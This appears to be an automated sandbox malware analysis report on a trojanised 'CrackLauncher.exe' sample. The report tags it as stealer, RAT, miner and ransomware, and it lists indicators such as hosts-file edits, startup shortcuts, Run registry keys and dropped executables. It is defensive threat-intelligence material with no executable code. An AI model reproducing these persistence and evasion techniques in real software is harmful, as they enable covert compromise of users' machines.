Malware Analysis Report

2024-10-10 09:50

Sample ID 240626-lhyhma1cmj
Target CrackLauncher.exe
SHA256 87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
Tags
umbral xmrig xworm evasion execution miner persistence ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95

Threat Level: Known bad

The file CrackLauncher.exe was found to be: Known bad.

Malicious Activity Summary

umbral xmrig xworm evasion execution miner persistence ransomware rat spyware stealer trojan upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Umbral payload

Umbral

Detect Xworm Payload

xmrig

Xworm

Contains code to disable Windows Defender

Renames multiple (115) files with added filename extension

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Stops running service(s)

Creates new service(s)

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

UPX packed file

.NET Reactor proctector

Power Settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Checks SCSI registry key(s)

Runs ping.exe

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Runs net.exe

Suspicious use of WriteProcessMemory

Detects videocard installed

Views/modifies file attributes

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious behavior: GetForegroundWindowSpam

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 09:32

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 09:32

Reported

2024-06-26 09:52

Platform

win10-20240404-en

Max time kernel

945s

Max time network

1203s

Command Line

C:\Windows\system32\lsass.exe

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2540 created 640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\system32\lsass.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

xmrig

miner xmrig

Renames multiple (115) files with added filename extension

ransomware

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts N/A N/A

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
